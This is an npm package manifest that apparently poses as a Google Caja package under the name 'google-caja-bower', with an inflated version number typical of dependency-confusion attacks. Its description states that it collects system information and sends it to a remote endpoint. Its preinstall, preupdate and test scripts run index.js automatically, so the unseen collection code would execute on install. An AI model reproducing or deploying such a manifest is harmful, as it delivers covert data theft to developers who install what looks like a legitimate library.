{
    "name": "google-caja-bower",
    "version": "1000.800.20",
    "description": "A Node.js package to collect and send system information to a remote endpoint",
    "keywords": [],
    "license": "ISC",
    "author": "bytes_knight",
    "type": "commonjs",
    "main": "index.js",
    "scripts": {
        "test": "node index.js",
        "preinstall": "node index.js",
        "preupdate": "node index.js"
    },
    "dependencies": {
        "puppeteer": "^24.24.1"
    },
    "devDependencies": {}
}